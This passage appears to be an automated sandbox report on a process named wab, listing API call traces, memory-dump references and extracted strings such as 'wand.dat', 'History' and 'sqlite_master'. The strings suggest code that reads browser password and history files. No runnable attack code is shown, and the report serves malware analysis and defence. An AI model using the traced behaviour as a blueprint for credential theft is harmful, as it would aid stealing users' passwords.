                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$??3@
                                                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                                                    • API String ID: 3314356048-2133833424
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                    • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3023356884-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3023356884-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1171893557-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7756DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7756DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4284152360-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
